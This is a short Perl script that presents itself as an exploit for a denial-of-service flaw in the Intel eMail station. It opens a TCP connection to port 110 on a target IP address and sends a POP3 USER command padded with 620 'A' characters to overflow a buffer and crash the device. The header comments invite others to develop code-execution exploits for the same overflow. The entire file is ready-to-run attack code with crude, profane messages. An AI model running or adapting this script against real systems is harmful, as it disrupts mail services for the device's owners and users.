#!/usr/bin/perl
# ereet perl script to exploit an old DoS condition in the Intel eMail station
# I have an eMail station if someone wants to create exploit code for this
# buffer overflow.. contact me thru knud@NOSPAMREMOVETHISskodliv.dk - danish
# people get free p&p, you foreigners gotta pay.
# slapped together by KAN|N & masskic.

use Socket;
$remote = $ARGV[0];
$string = "A" x 620;
$port = "110";
if(!$ARGV[0]){
print "no you dumbass, read the script\n";
print "usage: perl mailstation.pl <mail.station.ip> \n";
exit;
};

$iaddr = inet_aton($remote) or die "crap, it fucked up $!";
$paddr = sockaddr_in($port, $iaddr) or die "crap, it fucked up $!";
$proto = getprotobyname('tcp') or die "crap, it fucked up $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "crap, it fucked up $!";
connect(SOCK, $paddr) or die "crap, it fucked up $!";;
$poo = "USER $string\n";
send(SOCK, $poo, 0) or die "crap, it fucked up $!";

print "ze crap is sent mister \n";
exit;
